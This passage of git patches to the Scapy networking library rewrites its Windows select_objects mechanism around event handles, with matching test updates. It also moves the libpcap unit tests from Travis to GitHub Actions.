pkt_data, time)""" # noqa: E501 if self.cls is None: @@ -91,8 +85,7 @@ def recv_raw(self, x=MTU): return self.cls, pkt, ts def nonblock_recv(self): - """Receives and dissect a packet in non-blocking mode. - Note: on Windows, this won't do anything.""" + """Receives and dissect a packet in non-blocking mode.""" self.ins.setnonblock(1) p = self.recv(MTU) self.ins.setnonblock(0) @@ -100,7 +93,7 @@ def nonblock_recv(self): @staticmethod def select(sockets, remain=None): - return _select_nonblock(sockets, remain=None) + return select_objects(sockets, remain) ########## # PCAP # @@ -111,7 +104,7 @@ def select(sockets, remain=None): if WINDOWS: # Windows specific NPCAP_PATH = os.environ["WINDIR"] + "\\System32\\Npcap" - from scapy.libs.winpcapy import pcap_setmintocopy + from scapy.libs.winpcapy import pcap_setmintocopy, pcap_getevent else: from scapy.libs.winpcapy import pcap_get_selectable_fd from ctypes import POINTER, byref, create_string_buffer, c_ubyte, cast @@ -294,8 +287,7 @@ def datalink(self): def fileno(self): if WINDOWS: - log_runtime.error("Cannot get selectable PCAP fd on Windows") - return -1 + return pcap_getevent(self.pcap) else: # This does not exist under Windows return pcap_get_selectable_fd(self.pcap) @@ -381,13 +373,7 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, monito if promisc is None: promisc = conf.sniff_promisc self.promisc = promisc - # Note: Timeout with Winpcap/Npcap - # The 4th argument of open_pcap corresponds to timeout. In an ideal world, we would # noqa: E501 - # set it to 0 ==> blocking pcap_next_ex. - # However, the way it is handled is very poor, and result in a jerky packet stream. # noqa: E501 - # To fix this, we set 100 and the implementation under windows is slightly different, as # noqa: E501 - # everything is always received as non-blocking - self.ins = open_pcap(iface, MTU, self.promisc, 100, + self.ins = open_pcap(iface, MTU, self.promisc, 0, monitor=monitor) try: ioctl(self.ins.fileno(), BIOCIMMEDIATE, struct.pack("I", 1)) @@ -417,8 +403,7 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, nofilt if promisc is None: promisc = 0 self.promisc = promisc - # See L2pcapListenSocket for infos about this line - self.ins = open_pcap(iface, MTU, self.promisc, 100, + self.ins = open_pcap(iface, MTU, self.promisc, 0, monitor=monitor) self.outs = self.ins try: diff --git a/scapy/arch/windows/native.py b/scapy/arch/windows/native.py index 37815c2c2a6..b8788fbc653 100644 --- a/scapy/arch/windows/native.py +++ b/scapy/arch/windows/native.py @@ -49,8 +49,7 @@ import subprocess import time -from scapy.automaton import SelectableObject -from scapy.arch.common import _select_nonblock +from scapy.automaton import SelectableObject, select_objects from scapy.arch.windows.structures import GetIcmpStatistics from scapy.compat import raw from scapy.config import conf @@ -65,6 +64,7 @@ class L3WinSocket(SuperSocket, SelectableObject): desc = "a native Layer 3 (IPv4) raw socket under Windows" nonblocking_socket = True + __selectable_force_select__ = True __slots__ = ["promisc", "cls", "ipv6", "proto"] def __init__(self, iface=None, proto=socket.IPPROTO_IP, @@ -186,9 +186,6 @@ def recv_raw(self, x=MTU): else: return IP, data, time.time() - def check_recv(self): - return True - def close(self): if not self.closed and self.promisc: self.ins.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF) @@ -196,7 +193,7 @@ def close(self): @staticmethod def select(sockets, remain=None): - return _select_nonblock(sockets, remain=remain) + return select_objects(sockets, remain) class L3WinSocket6(L3WinSocket): diff --git a/scapy/automaton.py b/scapy/automaton.py index cc06e4d0d2d..6ea67bb0b35 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -11,17 +11,18 @@ - add documentation for ioevent, as_supersocket... """ -import io +import ctypes import itertools import logging import os +import random import sys import threading import time import traceback import types -from select import select +import select from collections import deque from scapy.config import conf @@ -34,199 +35,104 @@ import scapy.modules.six as six -""" In Windows, select.select is not available for custom objects. Here's the implementation of scapy to re-create this functionality # noqa: E501 -# Passive way: using no-ressources locks - +---------+ +---------------+ +-------------------------+ # noqa: E501 - | Start +------------->Select_objects +----->+Linux: call select.select| # noqa: E501 - +---------+ |(select.select)| +-------------------------+ # noqa: E501 - +-------+-------+ - | - +----v----+ +--------+ - | Windows | |Time Out+----------------------------------+ # noqa: E501 - +----+----+ +----+---+ | # noqa: E501 - | ^ | # noqa: E501 - Event | | | # noqa: E501 - + | | | # noqa: E501 - | +-------v-------+ | | # noqa: E501 - | +------+Selectable Sel.+-----+-----------------+-----------+ | # noqa: E501 - | | +-------+-------+ | | | v +-----v-----+ # noqa: E501 -+-------v----------+ | | | | | Passive lock<-----+release_all<------+ # noqa: E501 -|Data added to list| +----v-----+ +-----v-----+ +----v-----+ v v + +-----------+ | # noqa: E501 -+--------+---------+ |Selectable| |Selectable | |Selectable| ............ | | # noqa: E501 - | +----+-----+ +-----------+ +----------+ | | # noqa: E501 - | v | | # noqa: E501 - v +----+------+ +------------------+ +-------------v-------------------+ | # noqa: E501 - +-----+------+ |wait_return+-->+ check_recv: | | | | # noqa: E501 - |call_release| +----+------+ |If data is in list| | END state: selectable returned | +---+--------+ # noqa: E501 - +-----+-------- v +-------+----------+ | | | exit door | # noqa: E501 - | else | +---------------------------------+ +---+--------+ # noqa: E501 - | + | | # noqa: E501 - | +----v-------+ | | # noqa: E501 - +--------->free -->Passive lock| | | # noqa: E501 - +----+-------+ | | # noqa: E501 - | | | # noqa: E501 - | v | # noqa: E501 - +------------------Selectable-Selector-is-advertised-that-the-selectable-is-readable---------+ -""" - - class SelectableObject(object): - """DEV: to implement one of those, you need to add 2 things to your object: - - add "check_recv" function - - call "self.call_release" once you are ready to be read - - You can set the __selectable_force_select__ to True in the class, if you want to # noqa: E501 - force the handler to use fileno(). This may only be usable on sockets created using # noqa: E501 - the builtin socket API.""" - __selectable_force_select__ = False - - def __init__(self): - self.hooks = [] - - def check_recv(self): - """DEV: will be called only once (at beginning) to check if the object is ready.""" # noqa: E501 - raise OSError("This method must be overwritten.") - - def _wait_non_ressources(self, callback): - """This get started as a thread, and waits for the data lock to be freed then advertise itself to the SelectableSelector using the callback""" # noqa: E501 - self.trigger = threading.Lock() - self.was_ended = False - self.trigger.acquire() - self.trigger.acquire() - if not self.was_ended: - callback(self) - - def wait_return(self, callback): - """Entry point of SelectableObject: register the callback""" - if self.check_recv(): - return callback(self) - _t = threading.Thread( - target=self._wait_non_ressources, - args=(callback,), - name="scapy.automaton wait_return" - ) - _t.setDaemon(True) - _t.start() - - def register_hook(self, hook): - """DEV: When call_release() will be called, the hook will also""" - self.hooks.append(hook) - - def call_release(self, aborted=False): - """DEV: Must be call when the object becomes ready to read. - Relesases the lock of _wait_non_ressources""" - self.was_ended = aborted - try: - self.trigger.release() - except (threading.ThreadError, AttributeError): + if WINDOWS: + def __init__(self): + self._fd = ctypes.windll.kernel32.CreateEventA( + None, 0, 0, + "SelectableObject %s" % random.random() + ) + + def call_release(self): + if ctypes.windll.kernel32.PulseEvent( + ctypes.c_void_p(self._fd)) == 0: + warning(ctypes.FormatError()) + + def _close_fd(self): + if self._fd and ctypes.windll.kernel32.CloseHandle( + ctypes.c_void_p(self._fd)) == 0: + warning(ctypes.FormatError()) + self._fd = None + + def __del__(self): + if hasattr(self, "_fd"): + self._close_fd() + else: + def call_release(self): pass - # Trigger hooks - for hook in self.hooks: - hook() - -class SelectableSelector(object): - """ - Select SelectableObject objects. - - inputs: objects to process - remain: timeout. If 0, return []. - customTypes: types of the objects that have the check_recv function. - """ + def close(self): + pass - def _release_all(self): - """Releases all locks to kill all threads""" - for i in self.inputs: - i.call_release(True) - self.available_lock.release() - - def _timeout_thread(self, remain): - """Timeout before releasing every thing, if nothing was returned""" - time.sleep(remain) - if not self._ended: - self._ended = True - self._release_all() - - def _exit_door(self, _input): - """This function is passed to each SelectableObject as a callback - The SelectableObjects have to call it once there are ready""" - self.results.append(_input) - if self._ended: - return - self._ended = True - self._release_all() - - def __init__(self, inputs, remain): - self.results = [] - self.inputs = list(inputs) - self.remain = remain - self.available_lock = threading.Lock() - self.available_lock.acquire() - self._ended = False - - def process(self): - """Entry point of SelectableSelector""" - if WINDOWS: - select_inputs = [] - for i in self.inputs: - if not isinstance(i, SelectableObject): - warning("Unknown ignored object type: %s", type(i)) - elif i.__selectable_force_select__: - # Then use select.select - select_inputs.append(i) - elif not self.remain and i.check_recv(): - self.results.append(i) - elif self.remain: - i.wait_return(self._exit_door) - if select_inputs: - # Use default select function - self.results.extend(select(select_inputs, [], [], self.remain)[0]) # noqa: E501 - if not self.remain: - return self.results - - threading.Thread( - target=self._timeout_thread, - args=(self.remain,), - name="scapy.automaton process" - ).start() - if not self._ended: - self.available_lock.acquire() - return self.results - else: - r, _, _ = select(self.inputs, [], [], self.remain) - return r + def check_recv(self): + return False def select_objects(inputs, remain): """ Select SelectableObject objects. Same than: - ``select.select([inputs], [], [], remain)`` + ``select.select(inputs, [], [], remain)`` But also works on Windows, only on SelectableObject. :param inputs: objects to process :param remain: timeout. If 0, return []. """ - handler = SelectableSelector(inputs, remain) - return handler.process() - - -class ObjectPipe(SelectableObject, io.BufferedIOBase): - + if not WINDOWS: + return select.select(inputs, [], [], remain)[0] + natives = [] + events = [] + results = [] + for i in list(inputs): + if getattr(i, "__selectable_force_select__", False): + natives.append(i) + elif isinstance(i, SelectableObject): + if i.check_recv(): + results.append(i) + else: + events.append(i) + else: + raise TypeError( + "Invalid type: %s (must extend SelectableObject)" + ) + if natives: + results.extend(select.select(natives, [], [], remain)[0]) + if events: + remainms = int((remain or 0) * 1000) + if len(events) == 1: + res = ctypes.windll.kernel32.WaitForSingleObject( + ctypes.c_void_p(events[0].fileno()), + remainms + ) + else: + res = ctypes.windll.kernel32.WaitForMultipleObjects( + len(events), + (ctypes.c_void_p * len(events))( + *[x.fileno() for x in events] + ), + False, + remainms + ) + if res != 0xFFFFFFFF and res != 0x00000102: # Failed or Timeout + results.append(events[res]) + return results + + +class ObjectPipe(SelectableObject): def __init__(self): self._closed = False - self.rd, self.wr = os.pipe() - self.queue = deque() + self.__rd, self.__wr = os.pipe() + self.__queue = deque() SelectableObject.__init__(self) def fileno(self): - return self.rd - - def check_recv(self): - return len(self.queue) > 0 + if WINDOWS: + return self._fd + else: + return self.__rd def send(self, obj): - self.queue.append(obj) - os.write(self.wr, b"X") + self.__queue.append(obj) + os.write(self.__wr, b"X") self.call_release() def write(self, obj): @@ -235,13 +141,16 @@ def write(self, obj): def flush(self): pass + def check_recv(self): + return bool(self.__queue) + def recv(self, n=0): if self._closed: if self.check_recv(): - return self.queue.popleft() + return self.__queue.popleft() return None - os.read(self.rd, 1) - return self.queue.popleft() + os.read(self.__rd, 1) + return self.__queue.popleft() def read(self, n=0): return self.recv(n) @@ -249,9 +158,11 @@ def read(self, n=0): def close(self): if not self._closed: self._closed = True - os.close(self.rd) - os.close(self.wr) - self.queue.clear() + os.close(self.__rd) + os.close(self.__wr) + self.__queue.clear() + if WINDOWS: + self._close_fd() def __del__(self): self.close() @@ -265,7 +176,7 @@ def select(sockets, remain=conf.recv_poll_rate): results.append(s) if results: return results, None - return select_objects(sockets, remain), None + return select_objects(sockets, remain) class Message: @@ -435,30 +346,27 @@ class _ATMT_Command: class _ATMT_supersocket(SuperSocket, SelectableObject): def __init__(self, name, ioevent, automaton, proto, *args, **kargs): - SelectableObject.__init__(self) self.name = name self.ioevent = ioevent self.proto = proto # write, read self.spa, self.spb = ObjectPipe(), ObjectPipe() - # Register recv hook - self.spb.register_hook(self.call_release) kargs["external_fd"] = {ioevent: (self.spa, self.spb)} kargs["is_atmt_socket"] = True self.atmt = automaton(*args, **kargs) self.atmt.runbg() - def fileno(self): - return self.spb.fileno() - def send(self, s): if not isinstance(s, bytes): s = bytes(s) - return self.spa.send(s) + self.spa.send(s) def check_recv(self): return self.spb.check_recv() + def fileno(self): + return self.spb.fileno() + def recv(self, n=MTU): r = self.spb.recv(n) if self.proto is not None: @@ -474,7 +382,7 @@ def close(self): @staticmethod def select(sockets, remain=conf.recv_poll_rate): - return select_objects(sockets, remain), None + return select_objects(sockets, remain) class _ATMT_to_supersocket: @@ -650,7 +558,6 @@ def read(self, n=65535): return os.read(self.rd, n) def write(self, msg): - self.call_release() if isinstance(self.wr, ObjectPipe): self.wr.send(msg) return @@ -683,8 +590,7 @@ def read(self, n=None): return self.recv(n) def send(self, msg): - self.wr.send(msg) - return self.call_release() + return self.wr.send(msg) def write(self, msg): return self.send(msg) diff --git a/scapy/contrib/cansocket_python_can.py b/scapy/contrib/cansocket_python_can.py index 456091c818a..936d39cfd37 100644 --- a/scapy/contrib/cansocket_python_can.py +++ b/scapy/contrib/cansocket_python_can.py @@ -220,7 +220,7 @@ def send(self, x): def select(sockets, *args, **kwargs): SocketsPool().multiplex_rx_packets() return [s for s in sockets if isinstance(s, PythonCANSocket) and - not s.iface.rx_queue.empty()], PythonCANSocket.recv + not s.iface.rx_queue.empty()] def close(self): if self.closed: diff --git a/scapy/contrib/isotp.py b/scapy/contrib/isotp.py index f81e002d9d6..845d566d9a0 100644 --- a/scapy/contrib/isotp.py +++ b/scapy/contrib/isotp.py @@ -723,7 +723,7 @@ def find_ready_sockets(): ready_sockets = find_ready_sockets() if len(ready_sockets) > 0 or not blocking: - return ready_sockets, None + return ready_sockets exit_select = Event() @@ -746,7 +746,7 @@ def my_cb(msg): pass ready_sockets = find_ready_sockets() - return ready_sockets, None + return ready_sockets ISOTPSocket = ISOTPSoftSocket diff --git a/scapy/layers/can.py b/scapy/layers/can.py index 418484c0b87..6b19c57d0e2 100644 --- a/scapy/layers/can.py +++ b/scapy/layers/can.py @@ -522,5 +522,5 @@ def __exit__(self, exc_type, exc_value, tracback): # emulate SuperSocket @staticmethod def select(sockets, remain=None): - # type: (List[SuperSocket], Optional[int]) -> Tuple[List[SuperSocket], None] # noqa: E501 - return sockets, None + # type: (List[SuperSocket], Optional[int]) -> List[SuperSocket] + return sockets diff --git a/scapy/layers/usb.py b/scapy/layers/usb.py index 015aed6036c..9e79ff5c28f 100644 --- a/scapy/layers/usb.py +++ b/scapy/layers/usb.py @@ -258,7 +258,7 @@ class USBpcapSocket(SuperSocket): @staticmethod def select(sockets, remain=None): - return sockets, None + return sockets def __init__(self, iface=None, *args, **karg): _usbpcap_check() diff --git a/scapy/pipetool.py b/scapy/pipetool.py index d37ec60a3cd..aa49c46ff72 100644 --- a/scapy/pipetool.py +++ b/scapy/pipetool.py @@ -6,19 +6,22 @@ from __future__ import print_function import os import subprocess -import collections import time import scapy.modules.six as six from threading import Lock, Thread -from scapy.automaton import Message, select_objects, SelectableObject +from scapy.automaton import ( + Message, + ObjectPipe, + select_objects, +) from scapy.consts import WINDOWS from scapy.error import log_runtime, warning from scapy.config import conf from scapy.utils import get_temp_file, do_graph -class PipeEngine(SelectableObject): +class PipeEngine(ObjectPipe): pipes = {} @classmethod @@ -38,6 +41,7 @@ def list_pipes_detailed(cls): print("###### %s" % pn) def __init__(self, *pipes): + ObjectPipe.__init__(self) self.active_pipes = set() self.active_sources = set() self.active_drains = set() @@ -45,10 +49,7 @@ def __init__(self, *pipes): self._add_pipes(*pipes) self.thread_lock = Lock() self.command_lock = Lock() - self.__fd_queue = collections.deque() - self.__fdr, self.__fdw = os.pipe() self.thread = None - SelectableObject.__init__(self) def __getattr__(self, attr): if attr.startswith("spawn_"): @@ -62,22 +63,11 @@ def f(*args, **kargs): return f raise AttributeError(attr) - def check_recv(self): - """As select.select is not available, we check if there - is some data to read by using a list that stores pointers.""" - return len(self.__fd_queue) > 0 - - def fileno(self): - return self.__fdr - def _read_cmd(self): - os.read(self.__fdr, 1) - return self.__fd_queue.popleft() + return self.recv() def _write_cmd(self, _cmd): - self.__fd_queue.append(_cmd) - os.write(self.__fdw, b"X") - self.call_release() + self.send(_cmd) def add_one_pipe(self, pipe): self.active_pipes.add(pipe) @@ -118,7 +108,7 @@ def run(self): RUN = True STOP_IF_EXHAUSTED = False while RUN and (not STOP_IF_EXHAUSTED or len(sources) > 1): - fds = select_objects(sources, 2) + fds = select_objects(sources, 0) for fd in fds: if fd is self: cmd = self._read_cmd() @@ -326,10 +316,10 @@ def __repr__(self): return s -class Source(Pipe, SelectableObject): +class Source(Pipe, ObjectPipe): def __init__(self, name=None): Pipe.__init__(self, name=name) - SelectableObject.__init__(self) + ObjectPipe.__init__(self) self.is_exhausted = False def _read_message(self): @@ -339,12 +329,6 @@ def deliver(self): msg = self._read_message self._send(msg) - def fileno(self): - return None - - def check_recv(self): - return False - def exhausted(self): return self.is_exhausted @@ -418,42 +402,27 @@ def stop(self): pass -class AutoSource(Source, SelectableObject): +class AutoSource(Source): def __init__(self, name=None): - SelectableObject.__init__(self) Source.__init__(self, name=name) - self.__fdr, self.__fdw = os.pipe() - self._queue = collections.deque() - - def fileno(self): - return self.__fdr - - def check_recv(self): - return len(self._queue) > 0 def _gen_data(self, msg): - self._queue.append((msg, False)) - self._wake_up() + ObjectPipe.send(self, (msg, False, False)) def _gen_high_data(self, msg): - self._queue.append((msg, True)) - self._wake_up() + ObjectPipe.send(self, (msg, True, False)) - def _wake_up(self): - os.write(self.__fdw, b"X") - self.call_release() + def _exhaust(self): + ObjectPipe.send(self, (None, None, True)) def deliver(self): - os.read(self.__fdr, 1) - try: - msg, high = self._queue.popleft() - except IndexError: # empty queue. Exhausted source + msg, high, exhaust = self.recv() + if exhaust: pass + if high: + self._high_send(msg) else: - if high: - self._high_send(msg) - else: - self._send(msg) + self._send(msg) class ThreadGenSource(AutoSource): @@ -588,7 +557,7 @@ def generate(self): time.sleep(self.period) if empty_gen: self.is_exhausted = True - self._wake_up() + self._exhaust() time.sleep(self.period2) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index ec2a9d74c52..503c6a3b15d 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -1130,7 +1130,6 @@ def _run(self, # Get select information from the sockets _main_socket = next(iter(sniff_sockets)) select_func = _main_socket.select - _backup_read_func = _main_socket.__class__.recv nonblocking_socket = _main_socket.nonblocking_socket # We check that all sockets use the same select(), or raise a warning if not all(select_func == sock.select for sock in sniff_sockets): @@ -1173,17 +1172,13 @@ def stop_cb(): remain = stoptime - time.time() if remain <= 0: break - sockets, read_func = select_func( - list(sniff_sockets.keys()), - remain - ) - read_func = read_func or _backup_read_func + sockets = select_func(list(sniff_sockets.keys()), remain) dead_sockets = [] for s in sockets: if s is close_pipe: break try: - p = read_func(s) + p = s.recv() except EOFError: # End of stream try: @@ -1197,8 +1192,8 @@ def stop_cb(): try: # Make sure it's closed s.close() - except Exception as ex: - msg = " close() failed with '%s'" % ex + except Exception as ex2: + msg = " close() failed with '%s'" % ex2 warning( "Socket %s failed with '%s'." % (s, ex) + msg ) diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 526200584b9..4dff0ecf413 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -247,7 +247,7 @@ def am(self, @staticmethod def select(sockets, remain=conf.recv_poll_rate): - # type: (List[SuperSocket], Optional[float]) -> Tuple[List[SuperSocket], None] # noqa: E501 + # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] """This function is called during sendrecv() routine to select the available sockets. @@ -261,7 +261,7 @@ def select(sockets, remain=conf.recv_poll_rate): # select.error has no .errno attribute if not exc.args or exc.args[0] != errno.EINTR: raise - return inp, None + return inp def __del__(self): # type: () -> None @@ -370,6 +370,7 @@ def send(self, x): class SimpleSocket(SuperSocket): desc = "wrapper around a classic socket" + nonblocking_socket = True def __init__(self, sock): # type: (socket.socket) -> None @@ -379,7 +380,6 @@ def __init__(self, sock): class StreamSocket(SimpleSocket): desc = "transforms a stream socket into a layer 2" - nonblocking_socket = True def __init__(self, sock, basecls=None): # type: (socket.socket, Optional[Type[Packet]]) -> None @@ -490,9 +490,9 @@ def close(self): @staticmethod def select(sockets, remain=None): - # type: (List[SuperSocket], Optional[float]) -> Tuple[List[SuperSocket], None] # noqa: E501 + # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] if (WINDOWS or DARWIN): - return sockets, None + return sockets return SuperSocket.select(sockets, remain=remain) @@ -527,8 +527,8 @@ def _iter(obj=cast(SndRcvList, obj)): @staticmethod def select(sockets, remain=None): - # type: (List[SuperSocket], Any) -> Tuple[List[SuperSocket], None] - return sockets, None + # type: (List[SuperSocket], Any) -> List[SuperSocket] + return sockets def recv(self, *args): # type: (*Any) -> Optional[Packet] diff --git a/scapy/utils.py b/scapy/utils.py index 4fde4c91ace..3b527f44545 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1314,8 +1314,8 @@ def __exit__(self, exc_type, exc_value, tracback): def select(sockets, # type: List[SuperSocket] remain=None, # type: Optional[float] ): - # type: (...) -> Tuple[List[SuperSocket], None] - return sockets, None + # type: (...) -> List[SuperSocket] + return sockets class PcapReader(RawPcapReader, _SuperSocket): diff --git a/test/contrib/isotp.uts b/test/contrib/isotp.uts index 65991a4f866..13346c6f321 100644 --- a/test/contrib/isotp.uts +++ b/test/contrib/isotp.uts @@ -36,7 +36,7 @@ class MockCANSocket(SuperSocket): self.sent_queue.put(p) @staticmethod def select(sockets, remain=None): - return sockets, None + return sockets # utility function that waits on list l for n elements, timing out if nothing is added for 1 second diff --git a/test/pipetool.uts b/test/pipetool.uts index bc3fda67cad..522e7eb060a 100644 --- a/test/pipetool.uts +++ b/test/pipetool.uts @@ -305,7 +305,7 @@ def _fail(): a = AutoSource() a._send = mock.MagicMock(side_effect=_fail) -a._wake_up() +a.send("x") try: a.deliver() except: @@ -665,16 +665,16 @@ assert DNS in res[0] and res[0][UDP].sport == 1234 p.stop() -= FDSourceSink on a Bunch object += FDSourceSink on a ObjectPipe object -fd = Bunch(write=lambda x: None, read=lambda: "hello", fileno=lambda: None) +obj = ObjectPipe() +obj.send("hello") -s = FDSourceSink(fd) +s = FDSourceSink(obj) d = Drain() c = QueueSink() s > d > c -assert s.fileno() == None s.push("data") s.deliver() assert c.q.get(timeout=1) == "hello" diff --git a/test/scapy/automaton.uts b/test/scapy/automaton.uts index faf2566ef13..d2feaf7faa7 100644 --- a/test/scapy/automaton.uts +++ b/test/scapy/automaton.uts @@ -100,7 +100,7 @@ class ATMT3(ATMT2): raise self.MAIN(s+"da") -a=ATMT3(init="a", debug=2, ll=lambda: None, recvsock=lambda: None) +a=ATMT3(init="a", ll=lambda: None, recvsock=lambda: None) r = a.run() r assert(r == 'cccccacabdacccacabdabda') @@ -397,7 +397,7 @@ def _tcp_client_test(): Connection=b'keep-alive', Host=b'www.secdev.org', ) - t = TCP_client.tcplink(HTTP, SECDEV_IP4, 80) + t = TCP_client.tcplink(HTTP, SECDEV_IP4, 80, debug=4) response = t.sr1(req, timeout=3) t.close() assert response.Http_Version == b'HTTP/1.1' @@ -405,7 +405,7 @@ def _tcp_client_test(): assert response.Reason_Phrase == b'OK' def _http_request_test(_raw=False): - response = http_request("www.google.com", path="/", raw=_raw, iptables=LINUX) + response = http_request("www.google.com", path="/", raw=_raw, iptables=LINUX, verbose=4) assert response.Http_Version == b'HTTP/1.1' assert response.Status_Code == b'200' assert response.Reason_Phrase == b'OK' diff --git a/test/tls/tests_tls_netaccess.uts b/test/tls/tests_tls_netaccess.uts index a2f3c55cdd9..928e01ac9e5 100644 --- a/test/tls/tests_tls_netaccess.uts +++ b/test/tls/tests_tls_netaccess.uts @@ -367,10 +367,11 @@ load_layer("http") def _test_connection(): a = TLSClientAutomaton.tlslink(HTTP, server="www.google.com", dport=443, - server_name="www.google.com") + server_name="www.google.com", debug=4) pkt = a.sr1(HTTP()/HTTPRequest(Host="www.google.com"), session=TCPSession(app=True), timeout=2, retry=3) a.close() + assert pkt assert HTTPResponse in pkt assert b"" in pkt[HTTPResponse].load diff --git a/test/windows.uts b/test/windows.uts index edbf5d7b4e9..2169ddce853 100644 --- a/test/windows.uts +++ b/test/windows.uts @@ -12,14 +12,14 @@ import mock ############ + Mechanics tests -= Automaton - SelectableSelector system timeout += Automaton - Test select_objects edge cases -class TimeOutSelector(SelectableObject): - def check_recv(self): - return False +assert select_objects([ObjectPipe()], 0) == [] +assert select_objects([ObjectPipe()], 1) == [] -assert select_objects([TimeOutSelector()], 0) == [] -assert select_objects([TimeOutSelector()], 1) == [] +a = ObjectPipe() +a.send("test") +assert select_objects([a], 0) == [a] ############ ############ From e3de1a2d957c7b0c71acaa3c4a064176bbc51dbf Mon Sep 17 00:00:00 2001 From: Gabriel Date: Sun, 14 Mar 2021 22:05:24 +0100 Subject: [PATCH 0530/1632] Move libpcap tests to Github Actions (#3136) --- .config/ci/install.sh | 11 +++++++++++ .config/ci/test.sh | 8 +++++++- .github/workflows/unittests.yml | 29 ++++++++++++++++++----------- .gitignore | 1 + .travis.yml | 6 ------ scapy/layers/l2.py | 4 +++- test/linux.uts | 2 +- test/regression.uts | 7 +++++++ 8 files changed, 48 insertions(+), 20 deletions(-) diff --git a/.config/ci/install.sh b/.config/ci/install.sh index 746bd794857..b2e470c6527 100755 --- a/.config/ci/install.sh +++ b/.config/ci/install.sh @@ -1,5 +1,16 @@ #!/bin/bash +# Usage: +# ./install.sh [install mode] + +# Detect install mode +if [[ "${1}" == "libpcap" ]]; then + export SCAPY_USE_LIBPCAP="yes" + if [[ ! -z "$GITHUB_ACTIONS" ]]; then + echo "SCAPY_USE_LIBPCAP=yes" >> $GITHUB_ENV + fi +fi + # Install on osx if [ "$OSTYPE" = "darwin"* ] || [ "$TRAVIS_OS_NAME" = "osx" ] then diff --git a/.config/ci/test.sh b/.config/ci/test.sh index e30c8924af7..cb368a21d9f 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -3,8 +3,9 @@ # test.sh # Usage: # ./test.sh [tox version] [both/root/non_root (default root)] -# Example: +# Examples: # ./test.sh 3.7 both +# ./test.sh 3.9 non_root if [ "$OSTYPE" = "linux-gnu" ] || [ "$TRAVIS_OS_NAME" = "linux" ] then @@ -42,6 +43,11 @@ then UT_FLAGS+=" -K not_pypy" fi +# libpcap +if [[ ! -z "$SCAPY_USE_LIBPCAP" ]]; then + UT_FLAGS+=" -K veth" +fi + # Create version tag (github actions) PY_VERSION="py${1//./}" PY_VERSION=${PY_VERSION/pypypy/pypy} diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 1fb0bf48c9b..8e04990832a 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -56,14 +56,15 @@ jobs: run: tox -e mypy utscapy: - name: ${{ matrix.os }} ${{ matrix.python }} ${{ matrix.mode }} + name: ${{ matrix.os }} ${{ matrix.installmode }} ${{ matrix.python }} ${{ matrix.mode }} runs-on: ${{ matrix.os }} - timeout-minutes: 25 + timeout-minutes: 20 strategy: matrix: os: [ubuntu-latest] - python: [2.7, pypy2, pypy3, 3.9] + python: [2.7, 3.9] mode: [both] + installmode: [''] include: # Linux non-root only tests - os: ubuntu-latest @@ -75,6 +76,18 @@ jobs: - os: ubuntu-latest python: 3.8 mode: non_root + # PyPy tests: root only + - os: ubuntu-latest + python: pypy2 + mode: root + - os: ubuntu-latest + python: pypy3 + mode: root + # Libpcap test + - os: ubuntu-latest + python: 3.9 + mode: root + installmode: 'libpcap' # MacOS tests - os: macos-latest python: 2.7 @@ -93,7 +106,7 @@ jobs: with: python-version: ${{ matrix.python }} - name: Install Tox and any other packages - run: ./.config/ci/install.sh + run: ./.config/ci/install.sh ${{ matrix.installmode }} - name: Run Tox run: ./.config/ci/test.sh ${{ matrix.python }} ${{ matrix.mode }} - name: Codecov @@ -105,20 +118,14 @@ jobs: analyze: name: CodeQL analysis runs-on: ubuntu-latest - strategy: - fail-fast: false - matrix: - language: ['python'] steps: - name: Checkout repository uses: actions/checkout@v2 with: fetch-depth: 2 - - run: git checkout HEAD^2 - if: ${{ github.event_name == 'pull_request' }} - name: Initialize CodeQL uses: github/codeql-action/init@v1 with: - languages: ${{ matrix.language }} + languages: 'python' - name: Perform CodeQL Analysis uses: github/codeql-action/analyze@v1 diff --git a/.gitignore b/.gitignore index b8685028c74..3f4c6767df0 100644 --- a/.gitignore +++ b/.gitignore @@ -9,5 +9,6 @@ test/*.html .tox .ipynb_checkpoints .mypy_cache +.vscode doc/scapy/_build doc/scapy/api diff --git a/.travis.yml b/.travis.yml index 911d7a270fd..e47173a1b5b 100644 --- a/.travis.yml +++ b/.travis.yml @@ -14,12 +14,6 @@ jobs: env: - TOXENV=py38-isotp_kernel_module,codecov - # libpcap - - os: linux - python: 3.8 - env: - - SCAPY_USE_LIBPCAP=yes TOXENV=py38-linux_root,codecov - # warnings/deprecations - os: linux python: 3.8 diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index b1224208f9d..b97dcaf4eb4 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -117,7 +117,9 @@ def __repr__(self): @conf.commands.register def getmacbyip(ip, chainCC=0): # type: (str, int) -> Optional[str] - """Return MAC address corresponding to a given IP address""" + """ + Returns the MAC address matching the route to reach a given IP address + """ if isinstance(ip, Net): ip = next(iter(ip)) ip = inet_ntoa(inet_aton(ip or "0.0.0.0")) diff --git a/test/linux.uts b/test/linux.uts index 10d49484dcf..b75d85c321c 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -319,7 +319,7 @@ assert _interface_selection(None, IP(dst="192.0.2.42")/UDP()) == "scapy0" exit_status = os.system("ip link del name dev scapy0") = Test 802.Q sniffing -~ linux needs_root python3_only +~ linux needs_root python3_only veth from threading import Thread, Condition diff --git a/test/regression.uts b/test/regression.uts index 22326e00a6d..3c90a3b0915 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1618,6 +1618,13 @@ retry_test(_test) = Traceroute function ~ netaccess tcpdump * Let's test traceroute +conf.route +conf.ifaces +conf.iface +conf.route.route("8.8.8.8") +getmacbyip(_[2]) +tshark(timeout=2) + ans, unans = traceroute("www.slashdot.org") ans.nsummary() 